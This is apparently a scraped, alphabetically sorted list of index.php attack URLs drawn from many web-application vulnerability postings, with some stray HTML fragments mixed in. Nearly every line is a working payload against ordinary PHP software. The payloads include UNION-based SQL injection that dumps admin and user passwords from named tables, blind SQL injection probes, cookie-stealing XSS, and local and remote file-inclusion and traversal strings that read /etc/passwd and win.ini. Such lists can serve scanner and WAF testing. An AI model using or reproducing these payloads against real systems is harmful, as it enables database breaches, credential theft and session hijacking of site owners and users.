index.php?id=1'-1 union select 1,2,3,4,5[SQL-Injection]--
index.php?id=-1%20union%20all%20select%201,version(),3,4,5,6--
index.php?id=-1%20union%20select%201,2,3,concat(login,0x3a,password),5,6,7%20from%20admin--
index.php?id=-1%27%20union%20select%201,2,@@version,4%20%23
index.php?id=131'
index.php?id=14" method="post" name="main" >
index.php?id=15 9\n";
index.php?id=1 AnD 1=1 
index.php?id=1 and substring(@@version,1,1)=4--
index.php?id=1 and substring(@@version,1,1)=5--
index.php?id=1> [GET][id=-1][CURRENT_USER()
index.php?id=1[GET][id=-1][MID((VERSION()),1,6)
index.php?id=1[GET][id=-1][MID((VERSION()),1,6)>
index.php?id=1[GET][id=-1][SELECT(CASE
index.php?id=1[GET][id=-1][SELECT(CASE> WHEN
index.php?id=1'[SQL_Injection]
index.php?id='1 UNION SELECT 1,2,3,4
index.php?id=-1 UNION SELECT 1,2,3,4,5,6,7 FROM dc_user
index.php?id=1+union+select+1,2,3,4,5,concat(username,0x3a,userpassword),7,8,9+from+rcmsv2_user
index.php?id=-1 union select 1,concat(id,0x3a,name,0x3a,surname,0x3a,email,0x3a,password),3,4,5,6,7,8,9,10 from users--&page=classified
index.php?id=223 12\n";
index.php?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C
index.php?id=24'
index.php?id=-24 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8 +from+information_schema.tables+where+table_schema =database()--
index.php?id=-24 UNION SELECT 1,@@VERSION,3,4,5,6,7,8-- 
index.php?id=298'
index.php?id=2 9\n";
index.php?id=2&view=event&a=-1 UNION ALL SELECT 1,2,3,4,5,6,7,CONCAT(username, 0x3a, password),NULL,NULL,NULL,12,13,NULL FROM comcms_users%23
index.php?id=300"
index.php?id=-3%20union%20select%201,version(),3,4,5,6,7,8--  <=- demo
index.php?id=%3Cimg%20src=javascript:alert(%22EllipsisSecuritTest%22)%3E
index.php?id=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C
index.php?id=3&dest=4%27+and+1=0%23 --> FALSE
index.php?id=3&dest=4%27+and+1=1%23 --> TRUE
index.php?id=3+union+select+1,2,3,4,concat(user(),0x3a,@@version),6,7,8,9,10--
index.php?id=3+union+select+1,concat(user(),0x3a,@@version),3,4,5,6,7,8,9,10--
index.php?id=5
index.php?id=511 and 1=1
index.php?id=511 and 1=2
index.php?id=511 and substring(@@version,1,1)=4
index.php?id=511 and substring(@@version,1,1)=5
index.php?id=-62%27%20UNION%20ALL%20SELECT%201,2,3,4,5,concat%28login,0x3c3d3e,senha,0x3c3d3e,nivel%29,7,8,9,10,11,12,13%20from%20theblog_users%20LIMIT%200,1--+
index.php?id=754ce025144839c2abe369c36d90d8e9&c=srch&i
index.php?id=7&mod_action=project_detail&mod_project_id=9
index.php?id=7 sell (script with hosting)
index.php?id=999
index.php?id=-9999
index.php?id=99999
index.php?id=-9999+union+all+select+1,2,@@version,4,5
index.php?id=-99+union+select+0,1,2,3,4,5,6,load_file('
index.php?id=-99 UNION SELECT NULL,VERSION(),NULL,NULL,NULL,NULL 
index.php?id=-99 UNION SELECT VERSION()
index.php?id=&action=login
index.php?ID_ADMIN=1&SUPER_ADMIN=1
index.php?IDAdmin=test
index.php?idAuthor=-31+union+select+1,version()--
index.php?idAuthor=[SQL]
index.php?id=dbimport
index.php?id_doc=19&id_oggetto=%22%3E%3Cscript%3Ealert(document.cookie)%3C
index.php? id=editticker
index.php?id=[id]
index.php?id=[id]&mode=yeardetail&aarstal=%27
index.php?ID_loc=-1%20union%20select%20version()--
index.php?ID_loc=-1 union select version()--
index.php?ID_loc=[sql]
index.php?id=login
index.php ID_MEMBER TABLE_PREF {params}
index.php ID_MEMBER TABLE_PREF {params}\n".
index.php?id=m&lnk=-9999+union+all+select+1,version(),3,4,5,6--
index.php?id=m&lnk='[sql injection here]
index.php?id=new&new=-1'%20UNION%20ALL%20SELECT%201,2,concat(database(),char(58),user(),char(58),version()),concat(username,0x3e,password),5,6,7,8,9+from+admins
index.php?id=null&page=-0+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19 
index.php?ID=null+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x202d20,ID,User_Login,User_Password),13,14,	      #
index.php?id_page=1
index.php?id_page=14       
index.php?id_page=5
index.php?id=[parameter][reverse_derectory]%00
index.php?ids=1"onmouseover=prompt(16)>&idx=hpriv&tg=topman
index.php?id='><script>alert(document.cookie)<
index.php?id="><script>alert(document.cookie)<
index.php?idsession='%20OR%20''='
index.php?id_sezione=297%20and%20substring(@@version,1,1)=4 [No]
index.php?id_sezione=297%20and%20substring(@@version,1,1)=5 [Ye$]
index.php?id_sezione=[$qL] 
index.php?id=signup&username=example&email=user@example.com&password=password&icon=&le=3&timeoffset=1
index.php?id=SQL
index.php?id=['SQL]
index.php?id=[SQL]
index.php?id= [SQL Codes]
index.php?id=[SQLi]
index.php?id=[Sql Injection]
index.php?id=[SQL Injection]
index.php?id=system&sub_id=users&action=add" method="post">
index.php?idt=-1 UNION SELECT 1,concat_ws(0x3a,pseudo,pass),3,4,5,6,7,8,9 FROM smb_user--
index.php?id=".$target_id."&dest=".$target_id;
index.php?id=themes&action=edit_template&file=aboutTemplate.php" method="post">
index.php?idt={SQL}
index.php?idx=123+AND+1=2+UNION+ALL+SELECT+version()--
index.php?idx=displayGanttChart&iIdOwner=1_<
index.php?idx=displayGanttChart&iIdOwner=1&iIdProject=0_<
index.php?idx=options&tg=calopt&urla=javascript:prompt(13); HTTP
index.php?idx=[SQLi]
index.php?id=[xxx][showUid]=[SQL-injection]&cHash=[xxx]
index.php?id=[yeardetail_id]
index.php (if the menu user-lookup returns positive)
index.php?imgdir=..
index.php?imgdir=&#039;><script>alert(10)<
index.php?inc=..
index.php?inc=category&get=[INDONESIANCODER]
index.php?inc= [inj3ct0r RFI]
index.php?inc= [inj3ct0r RFI] 
index.php?inc=[Local File]%00
index.php?include_file=..
index.php?include_file=knowledgebase_list.php&x_category=null union select null,concat(user(),0x3a,database(),0x3a,@@datadir),null,null,null,null--
index.php?include_file=knowledgebase_list.php&x_category=PARENT_CATEGORY&which=%3Cscript%3Ealert%28
index.php?include_file=[LFI]
index.php?include_files[]=&include_files[1]=
index.php?include_files[]=&include_files[1]=ftp:
index.php?include_file=ticket_submit.php
index.php?ind=..
index.php?ind=blog&op=edit_template
index.php?ind=blog&op=p_gal
index.php?ind=downloads&op=download_file&ide=3
index.php?ind=downloads&op=entry_view&iden=804
index.php?ind=downloads&op=submit_file
index.php?index=..
index.php?index=[Local File]%00
index.php?index_page=and 1=1
index.php?index.php?page=background
index.php?ind=',userid='1
index.php?inf=%3Cscript%3Ealert(document.cookie)%3C
index.php?infolder=..
index.php?ini[langpack]=shelladress
index.php?in=song&term=[Cross site scripting
index.php?in=song&term=<h1>Tested by DevilScreaM<
index.php?Itemid=3&option=contact
index.php?Itemid=43&option=contact
index.php?Itemid=53&option=com_hotspots&task=w&w=5+and+1=2+union+select+concat(username,0x3a,password)+from+jos_users--
index.php?Itemid=invalidparameter
index.php?jepage=edituser&userid=1 and 1=2 UNION SELECT 1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12 from users--
index.php?jepage=viewcategory&categoryid=84+and+1=2+union+all+select+1,group_concat(username,0x3a,password),3,4,5,6+from+users--
index.php?jepage=viewcategory&categoryid=[sql]
index.php?kategorieid=6[SQL]
index.php?kategorija=[SQL_Injection]
index.php?katid=40[SQL]
index.php?key=\\
index.php?_key=author&_order=1[SQL ATTACK QUERY]&_text[status]=-1&_type[]=0&mod=article
index.php?keyword=%271&mod=search&submit=GO
index.php?kp3=99884d8a63791f406585913d74476b11
index.php?l=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00.jpg
index.php?$lan_dir=[RFI]
index.php?lang=
index.php?lang=..
index.php?lang=";<
index.php?lang=0&CODE=01&id=1[SQL]
index.php?lang=0&CODE=02&id=1[SQL]
index.php?lang=0&CODE=14&id=1[SQL]
index.php?lang=4 and substring(@@version,1,1)=4-- (false or true)
index.php?lang=4 and substring(@@version,1,1)=5-- (true or false)
index.php?lang=4[BSQLi]
index.php?LANGCODE=
index.php?&lang_code=1%27SQL_CODE_HERE
index.php?lang_code=1'+and+sleep(5)%23 (get)
index.php?lang=DSecRG&language_full=..
index.php?Lang=En&ID=[SQL Injection]
index.php?lang=en.inc
index.php?lang=en&menuclick=-1+UNION+SELECT+concat_ws(char(58),USER(),DATABASE(),VERSION())
index.php?lang=en&option=com_acnews&task=view&id=-188'&Itemid=136&page=0 (Web Vuln.)
index.php?lang=en&option=com_acnews&task=view&id=331%27&page=0
index.php?lang=EN&page_id=106" 1
index.php?lang=EN&page_id=106 and
index.php?lang=EN&page_id=106 and 1=1
index.php?lang=EN&page_id=106 and 1=2
index.php?lang=EN&page_id=[Real id]" 1
index.php?lang=file
index.php?lang=[File-To-Require]%00
index.php?lang_id=-1+UNION+SELECT+concat_ws(char(58),id,adminuser,adminpass,status)+from+wmp_admin+limit+0,1
index.php?lang=[LFI]
index.php?LANG=[Lfi]
index.php?lang=[shell]
index.php?_language=..
index.php?&language=..
index.php?language=..
index.php?&language=<script>var%20test_variable=31
index.php?last_message=<script>alert(1)<
index.php?lastusername='%3E%3Cscript%3Ealert(
index.php?l=eng&mode=.
index.php?l=en"><script>alert(document.cookie);<
index.php?letra=2'+union+all+select+1,mail,3,pass+FROM+lc_usuario+WHERE+id=1
index.php?letra=D<script>alert('y3nh4ck3r was here!')<
index.php?level=%22%3E%3Cscript%3Ealert('r0t')%3C
index.php?level=search&searchterms=%22%3E%3Cscript%3Ealert('r0t')%3C
index.php?level=slideshow&mode=album&id='UNION SELECT
index.php?lg=de&css=1&mid=320&art=1
index.php?lid=&pid=&prID=999.9'
index.php?linkid= [SQL] &frame
index.php?list="
index.php?list=*&page=all 
index.php?ln=..
index.php?lng=..
index.php?lng=es"><script>alert(document.cookie)<
index.php?lng=it&amp;pg=admin&amp;s=cpie" method="post">
index.php?lng=it&amp;pg=admin&amp;s=cpie\" method=\"post\">
index.php?lng=it&mod=download&pg=download&c=5&download=1219238459
index.php?lng=it&p=-9999+union+all+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18--
index.php?lng=it&pg=admin&s=redattori
index.php?lng=it&pg=manager
index.php?lng=[LFI]
index.php?lng=[RFI]
index.php?load=..
index.php?load=importcc&submit=on"
index.php?loadpage=.
index.php?loc=account_confirmation&accname="><script>alert(1)<
index.php?loc=adminlogin&uid=100000
index.php?loc=adminlogin&uid="><script>alert(0)<
index.php?location=..
index.php?location=-1 UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7 FROM pmr.pmr_2_admins--
index.php?location=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C
index.php?location=anything
index.php?loc=campaignview&uid=100000&messagecode=void
index.php?loc=createadvertad&campaignid=VALIDID&uid=100000&adno=VALIDID&adtype=banner (ad url)
index.php?loc=createcampaign&mode=edit&uid=100000&campaignid=VALIDID
index.php?loc=createcampaign&mode=edit&uid=100000&campaignid=VALIDID (first- and
index.php?loc=createcampaign&mode=edit&uid=100000&campaignid=VALIDID (phone and passhint)
index.php?loc=createcampaign&mode=new&uid=100000&campaignid="><script>alert(0)<
index.php?loc=edit_ad_package&uid=100000&idno="><script>alert(0)<
index.php?loc=email_advertisers&uid=100000&mode=1&errors=&from=&message=&subject=
index.php?loc=email_advertisers&uid=100000&mode=1&errors=&from=&message=&subject= (first- and
index.php?loc=email_advertisers&uid=100000&mode=1&errors=&from="><script>alert(1)<
index.php?loc=login_lookup&uid="><script>alert(0)<
index.php?loc=mass_update_target_weight&uid=100000
index.php?loc=orderhistory&uid=100000
index.php?loc=previouslydeleted&uid=100000 << Only when the Admin has deleted the user and looks at this page!
index.php?loc=setup_account&e6=new&e12=bypass&e9="><script>alert(0)<
index.php?loc=view_account_stats&uid=100000&type=overall&period=all
index.php?loc=view_account_stats&uid=100000&type="><script>alert(2)<
index.php?loc=view_adrates&uid=100000
index.php?loc=view_adrates&uid="><script>alert(0)<
index.php?loc=view_adrates&uid=SomeRandomString
index.php?loc=view_ad_stats&uid=100000&campaignid=VALIDID&adno=VALIDID (ad url)
index.php?loc=view_campaign_stats&uid=100000&campaignid=VALIDID
index.php?loc=view_campaign_stats&uid=100000&campaignid=VALIDID (address and phone)
index.php?loc=view_campaign_stats&uid=100000&campaignid=VALIDID (first- and
index.php?logic=or&maximum=&term=%22%3Cscript%3Ealert('r0t')%3C
index.php?login=1&login=1&sec=estado&sec2=operation
index.php?login=1&sec=estado&sec2=operation
index.php?login=%22%3E%3Cscript%3Ealert%28%2FElipsis%2BSecurity%2BTest%2F%29%3C%2Fscript%3E&pswd=test
index.php?loginaction=1&begin="><script>alert(document.cookie);<
index.php?loginhash_data=21232f297a57a5a743894a0e4a801fc3&loginhash_user=admin&loginhash=1
index.php?login=true 
index.php?login=true" method="post">
index.php * loockup 4 password
index.php?l=users_add
index.php?l=users&alpha=A'-1 [SQL-INJECTION!]-- width="1000" height="800">
index.php?l=users&alpha=K'-1 [SQL-INJECTION!]-- width="1000" height="800">
index.php?l=users&alpha=M'-1 [SQL-INJECTION!]-- width="1000" height="800">
index.php?lvl=coll_see&id=-1
index.php?m=&#039;
index.php?m=1[BSQLi]
index.php?m=1[SQLi]
index.php?mact=News%2ccntnt01%2c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5cboot.ini%00%2c0&cntnt01articleid=1&cntnt01showtemplate=false&cntnt01returnid=39
index.php?m=admin">
index.php?main=666+and+1=2+union+select+concat_ws(0x3a,userName,userPass)+from+users--
index.php?maincat_id=-null+union+select+concat(username,0x3a,userpassword)+from+ipn_tblpasswords--
index.php?main=comment&sub=index&view=&qid=3&cat_id=-3+union+select+1,concat_ws(0x3a3a,uname,pwd),3,4,5,6,7,8,9,10+from+user
index.php?mainid=30+and+substring(@@version,1,1)=4 << TRUE
index.php?mainid=30+and+substring(@@version,1,1)=5 << FALSE
index.php?mainid=9+and+substring(@@version,1,1)=4 << TRUE
index.php?mainid=9+and+substring(@@version,1,1)=5 << FALSE
index.php?mainid=[SQL]
index.php?main=[INDONESIANCODER]
index.php?main_module=[ShEll]
index.php?main=nc&id=12%20and%201=0%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,concat%28ur,0x3a,ps%29,11,12,13,14,15%20from+user
index.php?main_page=product_info&cPath=1_15&products_id=80
index.php?main_page=product_info&cPath=1&products_id=2&zenid=dc8442eed192c973fe776f9cd16a1a6c
index.php?main_page=product_info&products_id=77
index.php?main_page=shopping_cart (OR)
index.php?mainpath=[LFI]%00
index.php?mainpath=[RFI]
index.php?manufacturers_id=-1+union+select+convert(user()+using+latin1)
index.php?mark='%22%3E%3Cscript%3Ealert(document.cookie)%3C
index.php?mark=5&productID='[SQL inj]
index.php?m=companies&a=addedit
index.php?m=contacts&a=addedit
index.php?m=content&c=rss&catid=-10	<= False
index.php?m=content&c=rss&catid=10	<= True
index.php?m=content&c=rss&catid=5	<= show MySQL Error (table)
index.php?_m=core&_a=editstaff&staffid=1" method="POST">
index.php?md=..
index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=1 and substring(@@version,1,1)=5 [NO°°]
index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=1 and substring(@@version,1,1)=5 [y&$ ;-)] 
index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=[sql] 
index.php?_m=downloads&_a=*SQLi*
index.php?_m=downloads&_a=view&
index.php?mekat=PHP_Scripte&seite=2
index.php?menuaction=calendar.uicalendar.day&date=20040701"><script>alert(document.cookie)<
index.php?menuaction=calendar.uicalendar.planner
index.php?menuaction=email.uicompose.compose&fldbal
index.php?menuaction=email.uimessage.message&msgbal
index.php?menuaction=forum.uiforum.post&type=new%22
index.php?menuaction=forum.uiforum.read&forum_id=3%
index.php?menuaction=forum.uiforum.read&msg=202%22%
index.php?menuaction=forum.uiforum.read&msg=42&pos=
index.php?menuaction=preferences.uicategories.edit&
index.php?menuaction=preferences.uicategories.index
index.php?menuaction=preferences.uicategories.index&cats_app=foobar[SQL] 
index.php?menuaction=projects.uiprojecthours.view_h
index.php?menuaction=projects.uiprojects.edit_proje
index.php?menuaction=projects.uiprojects.list_proje
index.php?menuaction=projects.uiprojects.view_proje
index.php?menuaction=todo.ui.show_list&order=[SQL_Q
index.php?menu=adorder&adid=-3+union+select+null,null,concat_ws(0x3a,username,password),null+From+users--
index.php?menu=documentos&id=69
index.php?menu=documentos&id=69" -p Concurso
index.php?menu=documentos&id=69\" -p Concurso
index.php?menu=forum_catview&catid=-1+union+all+select+1,2,3,4,5,concat(auser,0x3a,apass),7+from+admin--
index.php?menu=forum_catview&catid=-1+union+all+select+1,2,3,4,5,concat(username,0x3a,upass),7+from+users--
index.php?menuID=-1 union select 0,Group_CONCAT(loginnaam,CHAR(32,58,32),wachtwoord),2,3 from adminusers
index.php?menu_id=-1+UNION+SELECT+concat_ws(char(58),id,adminuser,adminpass,status)+from+wmp_admin+limit+0,1
index.php?menuid=<script>alert(document.cookie);<
index.php?menuid=[SQL] 
index.php?menuitem=29+AND+1=2+UNION+ALL+SELECT+version()--
index.php?Menus)
index.php?menu="><script>alert(0)<
index.php?menu=showarticle&aid=3+and+1=0
index.php?menu=showcat&cat=-1+union+all+select+1,concat(auser,0x3a,apass),3+from+admin--
index.php?menu=showcat&cat=-1+union+all+select+1,concat(username,0x3a,upass),3+from+users+limit+1,1--
index.php?menu=showcat&cid=-2+union+select+1,concat_ws(0x3a,username,password),3+from+coders--
index.php?menu=showcat&cid=-2+union+select+1,concat_ws(0x3a,username,password),3+from+resellers--
index.php?menu=showcat&cid=-2+union+select+1,concat_ws(0x3a,username,upass),3+from+users--
index.php?menu=tablon&apartado=ver_anuncio&id=-43+union+select+0,0,0,concat_ws(0x3a,login,password,email),0,0,0,0,0,0,0,0+from+usuarios
index.php?meta=[Shell URL]?
index.php?method=`
index.php?methode=showdetails&list=Advertisment&rollid=4' 
index.php?methode=showdetails&list=Advertisment&rollid=4'<script>alert(document.cookie)<
index.php?method=markread&list=zorumuser&fromlist=secmenu&frommethod="
index.php" method="post">
index.php" method="post">'
index.php" method="post" >
index.php" method="POST">
index.php" method="post" enctype="multipart
index.php" method="POST" id="zappa">
index.php" method="post" name="main">
index.php" method="post" name="main" >
index.php" method="post" name="main" id="main">
index.php?method=<script>alert('test')
index.php?method=userfunctions&'list=secmenu&
index.php?m=files&a=addedit_folder
index.php?m=files&a=addedit&folder=0
index.php?m=forums&a=addedit
index.php?MGR=[evilscript] |
index.php?mid=-11+union+select+1,version(),3,4--
index.php?mid={EV!L EXPLO!T}
index.php?mid=[SQL]
index.php?m_id={SQLi}
index.php?mid=[SQL Injection]
index.php?m=index.php?m=-1'+union+select+1,concat(uname,0x3a,pass),3,4,5,6,7+from+portal_users+where+id=1
index.php?mmactionComm=mmShowMailingLists%22%3E%3Cscript%3Ealert(document.cookie)%3C
index.php?m=member&id=&#039;
index.php?m=members&s=html&t=edit"><SCRIPT>alert()<
index.php?mn=0&pg=0&lang=
index.php?_m=news&_a=viewnews&newsid=62
index.php?_m=news&_a=viewnews&newsid=63
index.php?_m=news&_a=viewnews&newsid=[Sqli]
index.php?mod=..
index.php?mod=06_Download
index.php?mod=08_Files&amp;opmod=insertrecord" method="POST">
index.php?mod=0&id=-1337+UNION+ALL+SELECT+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6
index.php?mod=0&id=1[SQLI]
index.php?mod=%3Cscript%3Ealert(
index.php?mod=%3E%3Cscript%3Ealert(document.cookie)%3C
index.php?mod=account&add=saveadmin">
index.php?mod=addnews&action=addnews
index.php?mod=admins&delete=1" onclick="return (quest())"><IMG border=0 alt=Delete src="img
index.php?mod=admins" method=post>
index.php?mod=auth
index.php?mod=banners&cat_id=-1'%20UNION%20ALL%20SELECT%20null,concat(users_nick,0x3a,users_pwd),null,nu
index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_admin_users
index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_users
index.php?mod=cat&com=gallery&cpID=1+or+1=1 << true
index.php?mod=cat&com=gallery&cpID=1+or+1=2 << false
index.php?mod=cat&com=news&cpID=1+or+1=1 << true
index.php?mod=cat&com=news&cpID=1+or+1=2 << false
index.php?mod=categories
index.php?mod=ConcoursPhoto&VIEW=prix&C_ID=-1
index.php?modd=[Inj3ct Here ;)]
index.php?mod=Download
index.php?mod=downloads&filedl=30&before=8&p_dl=1
index.php?mode=..
index.php?mode=calendar&selectedday=18&month=5%27+AND+0+UNION+ALL+SELECT+1,user,pass,4,5,6+FROM+admin+WHERE+id=1
index.php?mode=calendar&selectedday=18&month=5%27+AND+0+UNION+ALL+SELECT+1,version(),database(),4,5,6
index.php?mode=calendar&selectedday=18&month=5&year=2009%27+AND+0+UNION+ALL+SELECT+1,user,pass,4,5,6 FROM admin WHERE id=1
index.php?mode=calendar&selectedday=18&month=5&year=2009%27+AND+0+UNION+ALL+SELECT+1,version(),database(),4,5,6
index.php?mode=delcom&comment_id=1" method="post">
index.php?mode=delcom&comment_id=1&redirect=adm&confirm=yes" method="post">
index.php?mod=editnews&action=editnews&id=1255182669&source=..
index.php?mod=editnews&action=list
index.php?mod=editnews&action=list&cat_msg=%3Cscript%3Ealert(
index.php?mod=editnews&action=list&news_per_page=%3Cscript%3Ealert(
index.php?mod=editnews&action=list&postponed_selected=%3E%3Cscript%3Ealert(
index.php?mod=editnews&action=list&source=..
index.php?mod=editnews&action=list&source_msg=%3Cscript%3Ealert(
index.php?mod=editnews&action=list&source=<script>alert(document.cookie)<
index.php?mod=editnews&action=list&unapproved_selected=%3E%3Cscript%3Ealert(
index.php?mode=editor&method=topic&f=1&c=1 (2 past a new post )
index.php?mode=edit&tab=[Cookie]
index.php?mode=edit&tab=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>
index.php?mode=events&act=viewevent&seid=-1%20union%20select%201,2,3,concat(mem_id,0x3a,username,0x3a,email,0x3a,password,0x3a,fname),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20members--
index.php?mode=events&act=viewevent&seid=-1%20union%20select%201,2,3,sess_id,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20admin--
index.php?mode=f&f=1'
index.php?mode=forums&forumId=[sql] 
index.php?mode=game_player&type=0&year=2010&game_id=-14 UNion Select 1,2,@@version
index.php?mode=home&cat=-99[SQL CODE]
index.php?mode=[LFI]
index.php?mode=mapinfo&map=%3Cscript%3Ealert(123)%3C
index.php?mode=page&page=..
index.php?mode=players&game=%3Cscript%3Ealert(123)%3C
index.php?mode=register&Approval=1 (1 register in to the web site)
index.php?mode=result&database_name=..
index.php?mode=search"
index.php?mode=stats&sid=THE_WEB_SITE_SID_HERE&show=page&pageid=-32+union+select+1,LOAD_FILE(0x2F6574632F706173737764)
index.php?mode=stats&sid=THE_WEB_SITE_SID_HERE&show=page&pageid=-32+union+select+1,@@version
index.php?mode=viewcat&cat_id=%3C%73%63%72%
index.php?mode=viewdate
index.php?mode=view&id=-1%20union%20select%201,load_file(0x433A5C417070536572765C7777775C6C6974656E65775C73657474696E67732E706870),3,4,5
index.php?mode=view&id=   code sql
index.php?mode=viewid&post_id=%3C%73%63%72%
index.php?mode=viewmonth&month_no=%3C%73%63
index.php?mode=view&save=1&size=&text=&banner=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&x=&y=&font=&RGBr=&RGBg=&RGBb=&angle=
index.php?mode=viewuser" 
index.php?mod=[EV!L]
index.php?mod=[existing module]&pg=..
index.php?mod=[forum_path]&op=disc&argumentname=[a_casual_char]
index.php?mod=Gallery
index.php?modID=%22%3E%3Cscript%3Ealert(document.cookie)%3C
index.php?modID=usrauthlogin&sgnuptype=csaleID&username=%22%3E%3Cscript%3Ealert(document.cookie)%3C
index.php?mod=[Javascript Code]             *
index.php?mod=jeuxflash&ac=play&id=-1%20union%20select%201,pass,3,4,5,6,7,8,9,10%20from%20users%20where%20id=1--
index.php?mod=jeuxflash&ac=play&id=-1%20union%20select%201,pseudo,3,4,5,6,7,8,9,10%20from%20users%20where%20id=1--
index.php?mod=jeuxflash&cat=-1%20union%20select%201,concat(pseudo,0x3a,pass),3%20from%20users%20where%20id=1--
index.php?mod=[LFI]%00
index.php?mod=list&com=user&uID=2&action=edit
index.php?modload=User
index.php?mod=[Local File]%00
index.php?modname=..
index.php?modname=certificate&op=elem
index.php?modname=faq&op=play&mode=hel
index.php?modname=[LFI]&op=lostpwd
index.php?modname=link&op=play&mode=ke
index.php?modname=meta_certificate&op
index.php?modname=news&op=savenews" enctype="application
index.php?modname=preassessment&op=modassessment" enctype="application
index.php?modname=saf&id=4
index.php?mod=news&action=recent&id=0&from=list'+and+31337-31337=0+--+
index.php?mod=news&action=recent&year=2009&month=8"+and+31337-31337=0+--+
index.php?mod=none_Admin\r\n";
index.php?mod=none_filemanager&amp;op="><textarea id="body" name="body" cols="90" rows="35">
index.php?mod=none_filemanager&dir=
index.php?mod=none_Login",
index.php?mod=none_Search&find=1&where=null
index.php?mod=options&action=syscon
index.php?mod=pages&id_ctg='[SQL INJECTION]
index.php?mod=pages&id_prd='[SQL INJECTION] 
index.php?mod=pages&idp='[SQL INJECTION]
index.php?modpath=
index.php?modpath=ftp:
index.php?mod=products&cat=-18+union+all+select+1,2,3,password,5,6+from+websiteadmin_admin_users--
index.php?mod=products&cat=-18+union+all+select+1,2,3,username,5,6+from+websiteadmin_admin_users--
index.php?mod=products&cat=230+and+substring(@@version,1,1)=4
index.php?mod=products&cat=230+and+substring(@@version,1,1)=5
index.php?mod=products&cat=[sqli]
index.php?mod=products&key=%27
index.php?mod=read&id=..
index.php?mod=read&id=1117979256
index.php?mod=replays&action=list&where=123%27%20union%20select%201,2,@@version,4,5%20--%20#
index.php?mod=re_send_email&ad_id=-7+union+select+concat(username,0x3e,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+websiteadmin_admin_users--
index.php?mod=<script>alert(document.cookie)<
index.php?mod=sl_pages&id=-2+union+select+1,2,user(),database(),5,6
index.php?mod=sl_pages&id=<script>alert(1)<
index.php?mod=sondages&do=results&id=-1%20union%20select%201,2,3,concat(pseudo,0x3a,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20users%20where%20id=1--
index.php?mod=sondages&do=results&id=1%20union%20select%20id,0,0,pseudo,pass,pseudo,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20%60users%60%20
index.php?module=<
index.php?module=..
index.php?module="
index.php?module';<
index.php?module=%27+union+select+username,password+from+mod_users+where+username=%27$name%27
index.php?module=account&do=user&id=2 
index.php?module=Account&do=UserInfo&uname=dok'+union+select+1,2,3,4,concat_ws(0x3a,user_name,user_password,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+kasseler_users+where+uid=1
index.php?module=Accounts&action=Import&pa
index.php?module=Accueil&action=..
index.php?module=admin&act=dispMemberAdminDeleteForm&member_srl=[ACCOUNT_NUMBER]
index.php?module=admin&act=dispMemberAdminInfo&member_srl=[ACCOUNT_NUMBER]
index.php?module=admin&act=dispMemberAdminList
index.php?module=admin&show=..
index.php?module=admin&show=users&area=manage_users&action=edit_user&member_id=null+union+all+select+1,2,3,4,concat_ws
index.php?module=announce&ANN_user_op=submit_announcement&MMN_position=3:3
index.php?module=Blocks&type=lang&func=..
index.php?module=blogwriter&historyyear=2007&historymonth=-1
index.php?module=Bugs&amp;action=index
index.php?module=calendar&calendar[view]
index.php?module=Calls&amp;action=index&amp;return_module=Calls&amp;return_action=DetailView
index.php?module=Cases&amp;action=index
index.php?module=cdk&func=loadmodule&system=cdk&sismodule=....
index.php?module=changepass">
index.php?module=config
index.php?module=config-tipsoftheday&action=edittip&tip=[VAILD_ID]'[SQLi]
index.php?module=contact
index.php?module=content&action=article&id=-80
index.php?module=custompages&slug=";
index.php?module=downloadcenter&action=download_home
index.php?module=Emails&action=ListView
index.php?module=[EV!L]
index.php?module=fatcat&fatcat[user]
index.php?module=foo%00
index.php?module=forum
index.php?module=Forum&do=ShowForum&fid=1'+union+select+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,user(),database(),8,9,10,11,version(),13,14,15+from+kasseler_users+where+uid=1
index.php?module=Forum&do=ShowTopic&tid=706'+union+select+1,2,3,4,concat_ws(0x3a,user_name,user_password,user_email),6,7,user(),9,10,11,version(),13,14,15,16,17,18+from+kasseler_users+where+uid=1
index.php?module=forum&show=section&id=-1%20union%20select%201,password,3,4%20from%20phpecms_users%20where%20id=1
index.php?module=forum&show=section&id=-1%20union%20select%201,username,3,4%20from%20phpecms_users%20where%20id=1
index.php?module=gallery&action=info&cate_id=1&id=-9999'+union+select+1,2,3,4,5,6,7,8,concat(gal_admin_username,0x3a3a,gal_admin_password),10+from+gallery_admin--
index.php?moduleid=m2_news[SQL-inj]&articleid=1
index.php?module=[LFI]
index.php?module=live_chat
index.php?module=login
index.php?module=Meetings&amp;action=index&amp;return_module=Meetings&amp;return_action=DetailView
index.php?module=mycontrolpanel&action=signature
index.php?module=mymessages
index.php?module=news&action=remove&id=[user ID] 
index.php?module=news&action=view&id=2
